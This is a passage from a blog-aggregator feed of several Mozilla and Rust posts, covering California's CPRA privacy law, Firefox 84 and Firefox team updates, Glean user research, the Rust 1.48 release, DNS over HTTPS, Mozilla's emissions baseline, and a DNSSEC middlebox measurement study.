We are heartened about the significant new right around “cross-context behavior advertising.” At its core, this right allows consumers to exert more control and opt-out of behavioral, targeted advertising — it will no longer matter if the publisher “sells” their data or not.

This control is one that Mozilla has been a keen and active supporter of for almost a decade; from our efforts with the Do Not Track mechanism in Firefox, to Enhanced Tracking Protection to our support of the Global Privacy Control experiment. However, this right is not exercised by default–users must take the extra step of opting in to benefit from it.

CPRA abolishes “dark patterns”

Another protection the CPRA brings is prohibiting the use of “dark patterns” or features of interface design meant to trick users into doing things that they might not want to do, but ultimately benefit the business in question. Dark patterns are used in websites and apps to give the illusion of choice, but in actuality are deliberately designed to deceive people.

For instance, how often the privacy preserving options — like opting out of tracking by companies — take multiple clicks, and navigating multiple screens to finally get to the button to opt-out, while the option to accept the tracking is one simple click. This is only one of many types of dark patterns. This behavior fosters distrust in the internet ecosystem and is patently bad for people and the web. And it needs to go. Mozilla also supports federal legislation that has been introduced focused on banning dark patterns.

CPRA introduces a new watchdog for privacy protection

The CPRA establishes a new data protection authority, the “California Privacy Protection Agency” (CPPA), the first of its kind in the US. This will improve enforcement significantly compared to what the currently responsible CA Attorney General is able to do, with limited capacity and priorities in other fields. The CPRA designates funds to the new agency that are expected to be around $100 million. How the CPRA will be interpreted and enforced will depend significantly on who makes up the five-member board of the new agency, to be created until mid-2021. Two of the board seats (including the chair) will be appointed by Gov. Newsom, one seat will be appointed by the attorney general, another by the Senate Rules Committee, and the fifth by the Speaker of the Assembly, to be filled in about 90 days.

CPRA requires companies to collect less data

CPRA requires businesses to minimize the collection of personal data (collect the least amount needed) — a principle Mozilla has always fostered internally and externally as core to our values, products and services. While the law doesn’t elaborate how this will be monitored and enforced, we think this principle is a good first step in fostering lean data approaches.

However, the CPRA in its current form still puts the responsibility on consumers to opt-out of the sale and retention of personal data. Also, it allows data-processing businesses to create exemptions from the CCPA’s limit on charging consumers differently when they exercise their privacy rights. Both provisions do not correspond to our goal of “privacy as a default”.

CPRA becomes effective January 1, 2023 with a look back period to January 2022. Until then, its provisions will need lots of clarification and more details, to be provided by lawmakers and the new Privacy Protection Agency. This will be hard work for many, but we think the hard work is worth the payoff: for consumers and for the internet.

The post Four key takeaways to CPRA, California’s latest privacy law appeared first on Open Policy & Advocacy.

Mozilla Addons BlogExtensions in Firefox 84

Here are our highlights of what’s coming up in the Firefox 84 release:

Manage Optional Permissions in Add-ons Manager

As we mentioned last time, users will be able to manage optional permissions of installed extensions from the Firefox Add-ons Manager (about:addons).

Optional permissions in about:addons

We recommend that extensions using optional permissions listen for browser.permissions.onAdded and browser.permissions.onRemoved API events. This ensures the extension is aware of the user granting or revoking optional permissions.

Thanks

We would like to thank Tom Schuster for his contributions to this release.

The post Extensions in Firefox 84 appeared first on Mozilla Add-ons Blog.

Robert O'CallahanDebugging With Screenshots In Pernosco

When debugging graphical applications it can be helpful to see what the application had on screen at a given point in time. A while back we added this feature to Pernosco.

This is nontrivial because in most record-and-replay debuggers the state of the display (e.g., the framebuffer) is not explicitly recorded. In rr for example, a typical application displays content by sending data to an X11 server, but the X11 server is not part of the recording.

Pernosco analyzes the data sent to the X11 server and reconstructs the updates to window state. Currently it only works for simple bitmap copies, but that's enough for Firefox, Chrome and many other modern applications, because the more complicated X drawing primitives aren't suitable for those applications and they do their complex drawing internally.

Pernosco doesn't just display the screenshots, it helps you debug with them. As shown in the demo, clicking on a screenshot shows a pixel-level zoomed-in view which lets you see the exact channel values in each pixel. Clicking on two screenshots highlights the pixels in them that are different. We know where the image data came from in memory, so when you click on a pixel we can trace the dataflow leading to that pixel and show you the exact moment(s) the pixel value was computed or copied. (These image debugging tools are generic and also available for debugging Firefox test failures.) Try it yourself!

Try Pernosco on your own code today!

Data@MozillaThis Week in Glean: Fantastic Facts and where to find them

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online.)

We have been working on Glean for a few years now, starting with an SDK with Android support and increasing our SDK platform coverage by implementing our core in Rust and providing language bindings for other platforms, well beyond the mobile space.

Before our next major leaps (FOG, Glean.js), we wanted to understand what our internal consumers thought of Glean: what challenges are they facing? Are we serving them well?

Disclaimer: I’m not a user researcher, and  I did my best to study (and practice!) how to make sure our team’s and our customers’ time investment would not be wasted, but I might have still gotten things wrong! “Interviewing Users: How to Uncover Compelling Insights” by Steve Portigal really helped me to put things into perspective and get a better understanding of the process!

Here’s what I learned from trying to understand how users work with Glean:

1. Rely on user researchers!

Humans can ask questions, that’s a fact.. right?

Yes, but that’s not sufficient to understand users and how they interact with the product. Getting a sense of what works for them and what doesn’t is much more difficult than asking “What would you like our product to do?”.

If your team has access to UX researchers, join efforts and get together to better understand your users 🙂

2. Define who to interview

Since I am in the Glean SDK team, we did not interview any of my team peers.

Glean has a very diverse user base: product managers, developers, data scientists, data engineers. All of them are using the Glean SDK, Pipeline and Tools in slightly different ways!

We decided to select representatives throughout Mozilla for each group. Moreover, we did not necessarily want feedback exclusively from people who already used Glean. Mozilla has a legacy telemetry system in Firefox most of the company was exposed to, so we made sure to include both existing Glean users and prospective Glean users.

We narrowed down the list to about 60 candidates, which was then refined to 50 candidates.

3. Logistics is important!

Before starting collecting feedback using the interview process, we tried to make sure that everything was in place to provide a smooth experience both for us and the interviewed folks, since all the interviews were performed online:

  • we set up a shared calendar to let interviewers grab interview slots;
  • we set up a template for a note-taking document, attempting to set a consistent style for all the notes;
  • we documented the high level structure of the interview: introduction (5 minutes) + conversation (30 minutes) + conclusions (5 minutes);
  • we set up email templates for inviting people to the interview; it included information about the interview, a link to an anonymous preliminary questionnaire (see the next point), a link to join the video meeting and a private link to the meeting notes.

4. Provide a way to anonymously send feedback

We knew that interviewing ~50 folks would have taken time, so we tried to get early feedback by sending an email to the engineering part of the company asking for feedback. By making the questionnaire anonymous, we additionally tried to make folks feel more comfortable in providing honest feedback (and critics!). We allowed participants to flag other participants and left it open during the whole interview process. Some of the highlights were duplicated between the interviews and the questionnaire, but the latter got us a few insights that we were not able to capture in live interviews.

5. Team up!

Team support was vital during the whole process, as each interview required at least two people in addition to the interviewed one: the interviewer (the person actually focusing on the conversation) and the note taker. This allowed the interviewer to exclusively pay attention to the conversation, keeping track of the context and digging into aspects of the conversation that they deemed interesting. At the end of each interview, in the last 5 minutes, the note taker would ask any remaining questions or details.

6. Prepare relevant base questions

To consistently interview folks, we prepared a set of base questions to use in all the interviews. A few questions from this list would be different depending on the major groups of interviewees we identified: data scientists (both who used and not used Glean), product managers, developers (both who used and not used Glean).

We ended up with a list of 10 questions, privileging open-ended questions and avoiding leading or closed questions (well, except for the “Have you ever used Glean” part 🙂 ).

7. Always have post-interview sync ups

Due to the split between the note-taker and the interviewer, it was vital for us to have 15 minutes, right after the interview, to fill in missing information in the notes and share the context between the interviewing members.

We learned after the initial couple of interviews that the more we waited for the sync up meeting, the more the notes appeared foggy in our brain.

8. Review and work on notes as you go

While we had post-interview sync-ups, all the findings from each interview were noted down together with the notes document for that interview. After about 20 interviews, we realized that all the insights needed to be in a single report: that took us about a week to do, at the end of the interviewing cycle, and it would have been much faster to note them down in a structured format after each interview.

Well, we learn by making mistakes, right?

9. Publish the results

The interviews were a goldmine of discoveries: our assumptions were challenged in many areas, giving us a lot of food for thought. Our findings did not exclusively touch our team! For this reason we decided to create a presentation and disseminate the information about our process and its results in a biweekly meeting in our Data Org.

The raw insights have so far been shared with the relevant teams, who are triaging them.

10. Make the insights REALLY actionable

Our team is still working on this 🙂 We have received many insights from this process and are figuring out how to guarantee that all of them are considered and don’t fall back in our team’s backlog. We are considering reserving bandwidth to specifically address the most important ones on a monthly basis.

Many of the findings already informed our current choices and designs, some of them are changing our priorities and sparking new conversations in our whole organization.

We believe that getting user feedback early in the process is vital: part of this concern is eased by our proposal culture (before we dive into development, we asynchronously discuss with all the stakeholders on shared documents with the intent of ironing out the design, together!) but there’s indeed huge value in performing more frequent interviews (maybe on a smaller number of folks) with all the different user groups.

Firefox NightlyThese Weeks in Firefox: Issue 83

Highlights

Friends of the Firefox team

Resolved bugs (excluding employees)

Fixed more than one bug

  • Andrey Bienkowski
  • Ben D (:rockingskier)
  • Chris Jackson
  • Cody Welsh
  • Fabien Casters [:vaga]
  • Hunter Jones
  • Itiel
  • Martin Stránský [:stransky]
  • Michael Goossens
  • Niklas Baumgardner
  • Tim Nguyen :ntim
  • Tom Schuster [:evilpie]

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • Fixed an issue with built themes disappearing for one sessions after upgrading to Firefox 82 (fixed by Bug 1672314, caught due to the recent changes to the theme resource urls introduced in Bug 1660557)
  • Some minor follow ups related to the the new verified and mozilla badges in the about:addons extensions list (Bug 1666042, Bug 1666503)
  • Itiel contributed an RTL-related followup fix for the optional permissions list part of the about:addons detail view (Bug 1672502, follow up for Bug 1624513)
  • ntim contributed some small refactoring for about:addons (Bug 1676292, Bug 1677530), in preparation for completely removing the remaining bits of the legacy XUL-based about:addons page
WebExtensions Framework
  • Landed a fix to make sure that the extension messaging Ports are garbage collected when the related extension content is destroyed (Bug 1652925)
  • Brad Werth made sure that the extension popups and sidebar panels can be zoomed using the Ctrl-scroll wheel as in the browser tabs (Bug 1634556)
  • Mark Banner did make sure we reset/restore the default search engine when an addon did override it and then was uninstalled at early startup (Bug 1643858)
WebExtension APIs
  • Tom Schuster extended the browsingData API to support clearing the browsing data for a specific contained tab using a new optional cookieStoreId parameter (Bug 1670811, + follow up fix from Bug 1675643)

Bookmarks

  • “Other Bookmarks” Folder in Bookmarks Toolbar – If users have bookmarks stored in Other Bookmarks, a button for it will appear in the bookmarks toolbar (bug). An option to hide this folder from the toolbar is currently in progress (bug).
  • Bookmarks are stored in the Bookmarks Toolbar by default – For new users, the default location for storing bookmarks is now in the bookmarks toolbar (bug).
  • “Import Bookmarks” Button – New profiles will display an “import” button on the bookmarks toolbar (bug).
  • Showing the Bookmarks Toolbar on the New Tab page by default and replacing the Bookmarks Toolbar hide/show toggleNew options for showing the bookmarks toolbar: “Always”, “Never”, and “Only on New Tab” (bug).
  • A message describing the Bookmarks Toolbar and linking to the library is shown on the toolbar when it is blank – If there are any bookmarks in the “Bookmarks Toolbar” folder or any other widgets on the toolbar this message will not be shown (the “Other Bookmarks” symlink folder does not count)Other bookmarks button on the far right of the bookmarks toolbar. The icon is a folder

Developer Tools

  • Network Panel – Introducing top level error component responsible for catching exceptions and rendering details, stack trace + link for filing bugzilla report (bug)The network panel indicates that it has crashed with a large button with the text "File Bug Report." It then lists the stack and the typeError that caused this crash
  • Performance panel – Building simple on-boarding UI for new performance panel (bug) The new profiler panel is based on Firefox profiler: profiler.firefox.comThe performance panel has a start recording button that will launch int he profiler and a settings dropdown, which matches the layout of the profiler toolbar button
  • Accessibility Panel – showing tab order on the current page, done by Yura Zenevich (bug), shipped in Firefox 84An accesibility panel that marks different components on a google homepage that are numbered underneath to reflect the taborder on the page
  • DevTools Fission – Making DevTools Fission compatible
  • Fission tests are now enabled on tier 1 (bug)
  • Continue making DevTools Fission compatible (wiki with known issues)
  • The project has 6 MVP remaining to be completed at Dec 14 – Dec 20
  • Marionette Fission – Making Marionette (the automation driver for Firefox) Fission compatible
  • The project has 13 MVP remaining to be completed at Nov 09 – Nov 22
  • Enabling Marionette new Fission compatible implementation (based on JSWindowActors) fixed an a memory leak and improved performance 15-20% across all platforms (bug).

Installer & Updater

  • mhowell is wrapping up work on the semaphore, to prevent multiple instances from updating each other, and to let the user know when Firefox can’t update as a result
  • agashlin landed a new uninstall ping, so we should get more information about users explicitly leaving Firefox (as opposed to silently ceasing to use Firefox)

Lint

  • Sonia enabled all ESLint rules for widget/tests/*.xhtml – these were files where we had postponed fixing all the eslint issues when moving from xul to xhtml.
  • Kris made it so that the ESLint list of services that are accessible via Services.* is now semi-automatically generated.

Password Manager

  • Tgiles landed Bug 1613620 – allow to remove/delete all stored logins/passwords

PDFs & Printing

  • emalysz updated the print dialog so it stays open if the user cancels choosing a filename for print-to-PDF
  • emalysz updated the error handling so it allows changing the destination and cancelling the print if a setting is invalid
  • emalysz updated the custom margin settings to account for the printed page orientation
  • nordzilla added support for duplex printing (print on both sides)
  • emilio fixed a bug where printing using the system dialog failed for about: pages
  • emalysz fixed a bug where changing the paper size with custom margins set could result in an error without it being displayed to the user

Performance

Performance Tools

  • Added shortcuts for call tree transforms.This shows the context menu that includes call tree transforms, an ability to search on searchfox, copy the function name, and copy the stack
  • Added a keyboard shortcut panel that is revealed by the shortcut “?”.Keyboard shortcuts panel that shows shortcuts for call tree, the flame graph, timeline, call tree transforms, and marker table
  • “Profile Info” panel now includes how many physical and logical CPU cores there are on the profiled machine.A platform popup that shows the OS, the ABI, and CPU information such as the number of physical and logical cores

Picture-in-Picture

Push

  • We are working with Ops and QA to coordinate testing (and setting up a staging server) for a major port of the Push Endpoint logic that was completed this past summer from python to Rust. Kudos to our intern mdrobnak for successfully completing this massive project. We expect to deploy to production in early 2021.
Search and Navigation
  • We’re running an holdback experiment to measure the impact of the new search mode feature on Release
  • We’re also working on various experiments related to vertical search in the Address Bar, both with partners, and with cool utils (weather, calculator, unit conversions)
  • Tweaked the tab-to-search onboarding result to not be dismissed too easily; now it requires 3 interactions (simply selecting the result counts as one) – Bug 1675611
  • Based on user-testing feedback, mostly to reduce the surprise impact, empty strings in search mode don’t show anymore the last executed searches – Bug 1675537
  • Search mode colors are now inverted on the Dark theme – Bug 1671668
  • Allow to complete @keywords with the Tab key – Bug 1669526
  • Url canonization (CTRL+Enter) does not happen anymore if a CTRL+V just happened and CTRL was not released before pressing Enter – Bug 1661000
  • Fixed an issue in both the search bar and the address bar causing the last keyup event to reach content – Bug 1641287, Bug 1673299
  • Fixed a regression where single words (like “space”) in search mode could open the “Did you mean to go to space” notification bar in case of a wildcard DNS. – Bug 1672509

Sync

  • The tokenserver (which runs python 2.7 and supports Firefox Sync) is being ported to Rust in Q4. You can follow along with progress here.
  • A minor change to better work with Spanner was made to our batch commit limit. See the Spanner docs for more details on mutation limits.

User Journey

WebRTC UI

  • The new WebRTC global indicator goes out for macOS and Windows today! \o/
    • This means system tray indicator icons for Windows, as well as an always-on-top indicator when sharing a display.
    • There are also global mutes for the microphone and camera, but these are off by default.

 

The Rust Programming Language BlogAnnouncing Rust 1.48.0

The Rust team is happy to announce a new version of Rust, 1.48.0. Rust is a programming language that is empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, getting Rust 1.48.0 is as easy as:

rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.48.0 on GitHub.

What's in 1.48.0 stable

The star of this release is Rustdoc, with a few changes to make writing documentation even easier! See the detailed release notes to learn about other changes not covered by this post.

Easier linking in rustdoc

Rustdoc, the library documentation tool included in the Rust distribution, lets you write documentation in Markdown. This makes it very easy to use, but also has some pain points. Let's say that you are writing some documentation for some Rust code that looks like this:

pub mod foo {
    pub struct Foo;
}

pub mod bar {
    pub struct Bar;
}

We have two modules, each with a struct inside. Imagine we wanted to use these two structs together; we may want to note this in the documentation. So we'd write some docs that look like this:

pub mod foo {
    /// Some docs for `Foo`
    ///
    /// You may want to use `Foo` with `Bar`.
    pub struct Foo;
}

pub mod bar {
    /// Some docs for `Bar`
    ///
    /// You may want to use `Bar` with `Foo`.
    pub struct Bar;
}

That's all well and good, but it would be really nice if we could link to these other types. That would make it much easier for the users of our library to navigate between them in our docs.

The problem here is that Markdown doesn't know anything about Rust, and the URLs that rustdoc generates. So what Rust programmers have had to do is write those links out manually:

pub mod foo {
    /// Some docs for `Foo`
    ///
    /// You may want to use `Foo` with [`Bar`].
    ///
    /// [`Bar`]: ../bar/struct.Bar.html
    pub struct Foo;
}

pub mod bar {
    /// Some docs for `Bar`
    ///
    /// You may want to use `Bar` with [`Foo`].
    ///
    /// [`Foo`]: ../foo/struct.Foo.html
    pub struct Bar;
}

Note that we've also had to use relative links, so that this works offline. Not only is this process tedious, and error prone, but it's also just wrong in places. If we put a pub use bar::Bar in our crate root, that would re-export Bar in our root. Now our links are wrong. But if we fix them, then they end up being wrong when we navigate to the Bar that lives inside the module. You can't actually write these links by hand, and have them all be accurate.

In this release, you can use some syntax to let rustdoc know that you're trying to link to a type, and it will generate the URLs for you. Here's two different examples, based off of our code before:

pub mod foo {
    /// Some docs for `Foo`
    ///
    /// You may want to use `Foo` with [`Bar`](crate::bar::Bar).
    pub struct Foo;
}

pub mod bar {
    /// Some docs for `Bar`
    ///
    /// You may want to use `Bar` with [`crate::foo::Foo`].
    pub struct Bar;
}

The first example will show the same text as before; but generate the proper link to the Bar type. The second will link to Foo, but will show the whole crate::foo::Foo as the link text.

There are a bunch of options you can use here. Please see the "Linking to items by name" section of the rustdoc book for more. There is also a post on Inside Rust on the history of this feature, written by some of the contributors behind it!

Adding search aliases

You can now specify #[doc(alias = "<alias>")] on items to add search aliases when searching through rustdoc's UI. This is a smaller change, but still useful. It looks like this:

#[doc(alias = "bar")]
struct Foo;

With this annotation, if we search for "bar" in rustdoc's search, Foo will come up as part of the results, even though our search text doesn't have "Foo" in it.

An interesting use case for aliases is FFI wrapper crates, where each Rust function could be aliased to the C function it wraps. Existing users of the underlying C library would then be able to easily search the right Rust functions!

Library changes

The most significant API change is kind of a mouthful: [T; N]: TryFrom<Vec<T>> is now stable. What does this mean? Well, you can use this to try and turn a vector into an array of a given length:

use std::convert::TryInto;

let v1: Vec<u32> = vec![1, 2, 3];

// This will succeed; our vector has a length of three, we're trying to
// make an array of length three.
let a1: [u32; 3] = v1.try_into().expect("wrong length");

// But if we try to do it with a vector of length five...
let v2: Vec<u32> = vec![1, 2, 3, 4, 5];

// ... this will panic, since we have the wrong length.
let a2: [u32; 3] = v2.try_into().expect("wrong length");

In the last release, we talked about the standard library being able to use const generics. This is a good example of the kinds of APIs that we can add with these sorts of features. Expect to hear more about the stabilization of const generics soon.

Additionally, five new APIs were stabilized this release:

The following previously stable APIs have now been made const:

See the detailed release notes for more.

Other changes

There are other changes in the Rust 1.48.0 release: check out what changed in Rust, Cargo, and Clippy.

Contributors to 1.48.0

Many people came together to create Rust 1.48.0. We couldn't have done it without all of you. Thanks!

Mozilla Open Policy & Advocacy BlogMozilla DNS over HTTPS (DoH) and Trusted Recursive Resolver (TRR) Comment Period: Help us enhance security and privacy online

For a number of years now, we have been working hard to update and secure one of the oldest parts of the Internet, the Domain Name System (DNS). We passed a key milestone in that endeavor earlier this year, when we rolled out the technical solution for privacy and security in the DNS – DNS-over-HTTPS (DoH) – to Firefox users in the United States. Given the transformative nature of this technology and our mission commitment to transparency and collaboration, we have consistently sought to implement DoH thoughtfully and inclusively. Therefore, as we explore how to bring the benefits of DoH to Firefox users in different regions of the world, we’re today launching a comment period to help inform our plans.

Some background

Before explaining our comment period, it’s first worth clarifying a few things about DoH and how we’re implementing it:

What is the ‘DNS’?

The Domain Name System (DNS for short) is a shared, public database that links a human-friendly name, such as www.mozilla.org, to a computer-friendly series of numbers, called an IP address (e.g. 192.0.2.1). By performing a “lookup” in this database, your web browser is able to find websites on your behalf. Because of how DNS was originally designed decades ago, browsers doing DNS lookups for websites — even for encrypted https:// sites — had to perform these lookups without encryption.

What are the security and privacy concerns with traditional DNS?

Because there is no encryption in traditional DNS, other entities along the way might collect (or even block or change) this data. These entities could include your Internet Service Provider (ISP) if you are connecting via a home network, your mobile network operator (MNO) if you are connecting on your phone, a WiFi hotspot vendor if you are connecting at a coffee shop, and even eavesdroppers in certain scenarios.

In the early days of the Internet, these kinds of threats to people’s privacy and security were known, but not being exploited yet. Today, we know that unencrypted DNS is not only vulnerable to spying but is being exploited, and so we are helping the Internet to make the shift to more secure alternatives. That’s where DoH comes in.

What is DoH and how does it mitigate these problems?

Following the best practice of encrypting HTTP traffic, Mozilla has worked with industry stakeholders at the Internet Engineering Task Force (IETF) to define a DNS encryption technology called DNS over HTTPS or DoH (pronounced “dough”), specified in RFC 8484. It encrypts your DNS requests, and responses are encrypted between your device and the DNS resolver via HTTPS. Because DoH is an emerging Internet standard, operating system vendors and browsers other than Mozilla can also implement it. In fact, Google, Microsoft and Apple have either already implemented or are in late stages of implementing DoH in their respective browsers and/or operating systems, making it a matter of time before it becomes a ubiquitous standard to help improve security on the web.

How has Mozilla rolled out DoH so far?

Mozilla has deployed DoH to Firefox users in the United States, and as an opt-in feature for Firefox users in other regions. We are currently exploring how to expand deployment beyond the United States. Consistent with Mozilla’s mission, in countries where we roll out this feature the user is given an explicit choice to accept or decline DoH, with a default-on orientation to protect user privacy and security.

Importantly, our deployment of DoH adds an extra layer of user protection beyond simple encryption of DNS lookups. Our deployment includes a Trusted Recursive Resolver (TRR) program, whereby DoH lookups are routed only to DNS providers who have made binding legal commitments to adopt extra protections for user data (e.g., to limit data retention to operational purposes and to not sell or share user data with other parties). Firefox’s deployment of DoH is also designed to respect ISP offered parental control services where users have opted into them and offers techniques for it to operate with enterprise deployment policies.

The comment period

As we explore bringing the benefits of DoH to more users, in parallel, we’re launching a comment period to crowdsource ideas, recommendations, and insights that can help us maximise the security and privacy-enhancing benefits of our implementation of DoH in new regions. We welcome contributions for anyone who cares about the growth of a healthy, rights-protective and secure Internet.

Engaging with the Mozilla DoH implementation comment period

  • Length: The global public comment period will last for a total of 45 days, starting from November 19, 2020 and ending on January 4, 2021.
  • Audience: The consultation is open to all relevant stakeholders interested in a more secure, open and healthier Internet across the globe.
  • Questions for Consultation: A detailed set of questions which serve as a framework for the consultation are available here. It is not mandatory to respond to all questions.
  • Submitting comments: All responses can be submitted in plaintext or in the form of an accessible pdf to doh-comment-period-2020@mozilla.com.

Unless the author/authors explicitly opt-out in the email in which they submit their responses, all genuine responses will be made available publicly on our blog. Submissions that violate our Community Participation Guidelines will not be published.

Our goal is that DoH becomes as ubiquitous for DNS as HTTPS is for web traffic, supported by ISPs, MNOs, and enterprises worldwide to help protect both end users and DNS providers themselves. We hope this public comment will take us closer to that goal, and we look forward to hearing from stakeholders around the world in creating a healthier Internet.

The post Mozilla DNS over HTTPS (DoH) and Trusted Recursive Resolver (TRR) Comment Period: Help us enhance security and privacy online appeared first on Open Policy & Advocacy.

The Mozilla BlogRelease: Mozilla’s Greenhouse Gas emissions baseline

When we launched our Environmental Sustainability Programme in March 2020, we identified three strategic goals:

  1. Reduce and mitigate Mozilla’s organisational impact;
  2. Train and develop Mozilla staff to build with sustainability in mind;
  3. Raise awareness for sustainability, internally and externally.

Today, we are releasing our baseline Greenhouse Gas emissions (GHG) assessment for 2019, which forms the basis upon which we will build to reduce and mitigate Mozilla’s organisational impact.

 

GHG Inventory: Summary of Findings

Mozilla’s overall emissions in 2019 amounted to: 799,696 mtCO2e (metric tons of carbon dioxide equivalent).

    • Business Services and Operations: 14,222 mtCO2e
      • Purchased goods and services: 8,654 mtCO2e
      • Business travel: 2,657 mtCO2e
      • Events: 1,199 mtCO2e
      • Offices and co-locations: 1,195 mtCO2e
      • Remotees: 194 mtCO2e
      • Commute: 147 mtCO2e
    • Product use: 785,474 mtCO2e

 

How to read these emissions

There are two major buckets:

  1. Mozilla’s impact in terms of business services and operations, which we calculated with as much primary data as possible;
  2. The impact of the use of our products, which makes up roughly 98% of our overall emissions.

In 2019, the use of products spanned Firefox Desktop and Mobile, Pocket, and Hubs.

Their impact is significant, and it is an approximation. We can’t yet really measure the energy required to run and use our products specifically. Instead, we are estimating how much power is required to use the devices needed to access our products for the time that we know people spent on our products. In other words, we estimate the impact of desktop computers, laptops, tablets, or phones while being online overall.

For now, this helps us get a sense of the impact the internet is having on the environment. Going forward, we need to figure out how to reduce that share while continuing to grow and make the web open and accessible to all.

The emissions related to our business services and operations cover all other categories from the GHG protocol that are applicable to Mozilla.

For 2019, this includes 10 offices and 6 co-locations, purchased goods and services, events that we either host or run, all of our commercial travel including air, rail, ground transportation, and hotels, as well as estimates of the impact of our remote workforce and the commute of our office employees, which we gathered through an internal survey.

 

How we look at this data

  1. It’s easy to lose sight of all the work we’ve got to do to reduce our business services and operations emissions, if we only look at the overarching distribution of our emissions: Pie chart visualising 2% impact for Business Services and Operations and 98% for Product Use
  2. If we zoom in on our business services and operations emissions, we’ll note that our average emissions per employee are: 12 mtCO2e.
  3. There is no doubt plenty of room for improvement. Our biggest area for improvement will likely be the Purchased Goods and Services category. Think: more local and sustainable sourcing, switching to vendors with ambitious climate targets and implementation plans, prolonging renewal cycles, and more. 
  4. In addition, we need to significantly increase the amount of renewable energy we procure for Mozilla spaces, which in 2019 was at: 27%.
  5. And while a majority of Mozillians already opt for a low-carbon commute, we’ll explore additional incentives here, too:column chart listing the percentages of different commute modes globally
  6. We will also look at our travel and event policies to determine where we add the most value, which trip is really necessary, how we can improve virtual participation, and where we have space for more local engagement.

You can find the longform, technical report in PDF format here.

We’ll be sharing more about what we learned from our first GHG assessment, how we’re planning to improve and mitigate our impact soon. Until then, please reach out to the team should you have any questions at sustainability@mozilla.com.

The post Release: Mozilla’s Greenhouse Gas emissions baseline appeared first on The Mozilla Blog.

This Week In RustThis Week in Rust 365

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Newsletters
Tooling
Observations/Thoughts
Rust Walkthroughs
Project Updates
Miscellaneous

Crate of the Week

This week's crate is lingua, a ngrams-based natural language detector.

Thanks to Willi Kappler for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

299 pull requests were merged in the last week

Rust Compiler Performance Triage

  • 2020-11-10: 1 Regression, 2 Improvements, 2 mixed

A mixed week with improvements still outweighing regressions. Perhaps the biggest highlight was the move to compiling rustc crates with the initial-exec TLS model which results in fewer calls to _tls_get_addr and thus faster compile times.

See the full report for more.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs

New RFCs

Upcoming Events

Online

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

This time we have two quotes of the week:

i just spent 8h finding a mutability bug and now i wanna be a catgirl

@castle_vanity on twitter reacting to a post depicting C++ programmers as muscle-laden bodybuilders and Rust programmers as catgirls

Thanks to Maximilian Goisser for the suggestion.

The code people write is first a question to the compiler, and later a story for people changing that code.

Esteban Kuber on /r/rust

llogiq is mightily pleased with his suggestion.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Mozilla Security BlogMeasuring Middlebox Interference with DNS Records

Overview

The Domain Name System (DNS) is often referred to as the “phonebook of the Internet.” It is responsible for translating human readable domain names–such as mozilla.org–into IP addresses, which are necessary for nearly all communication on the Internet. At a high level, clients typically resolve a name by sending a query to a recursive resolver, which is responsible for answering queries on behalf of a client. The recursive resolver answers the query by traversing the DNS hierarchy, starting from a root server, a top-level domain server (e.g. for .com), and finally the authoritative server for the domain name. Once the recursive resolver receives the answer for the query, it caches the answer and sends it back to the client.

Unfortunately, DNS was not originally designed with security in mind, leaving users vulnerable to attacks. For example, previous work has shown that recursive resolvers are susceptible to cache poisoning attacks, in which on-path attackers impersonate authoritative nameservers and send incorrect answers for queries to recursive resolvers. These incorrect answers then get cached at the recursive resolver, which may cause clients that later query the same domain names to visit malicious websites. This attack is successful because the DNS protocol typically does not provide any notion of correctness for DNS responses. When a recursive resolver receives an answer for a query, it assumes that the answer is correct.

DNSSEC is able to prevent such attacks by enabling domain name owners to provide cryptographic signatures for their DNS records. It also establishes a chain of trust between servers in the DNS hierarchy, enabling clients to validate that they received the correct answer.

Unfortunately, DNSSEC deployment has been comparatively slow: measurements show, as of November 2020, only about 1.8% of .com records are signed, and about 25% of clients worldwide use DNSSEC-validating recursive resolvers. Even worse, essentially no clients validate DNSSEC themselves, which means that they have to trust their recursive resolvers.

One potential obstacle to client-side validation is network middleboxes. Measurements have shown that some middleboxes do not properly pass all DNS records. If a middlebox were to block the RRSIG records that carry DNSSEC signatures, clients would not be able to distinguish this from an attack, making DNSSEC deployment problematic. Unfortunately, these measurements were taken long ago and were not specifically targeted at DNSSEC. To get to the bottom of things, we decided to run an experiment.

Measurement Description

There are two main questions we want to answer:

  • At what rate do network middleboxes between clients and recursive resolvers interfere with DNSSEC records (e.g., DNSKEY and RRSIG)?
  • How does the rate of DNSSEC interference compare to interference with other relatively new record types (e.g., SMIMEA and HTTPSSVC)?

At a high level, in collaboration with Cloudflare we will first serve the above record types from domain names that we control. We will then deploy an add-on experiment to Firefox Beta desktop clients which requests each record type for our domain names. Finally, we will check whether we got the expected responses (or any response at all). As always, users who have opted out of sending telemetry or participating in studies will not receive the add-on.

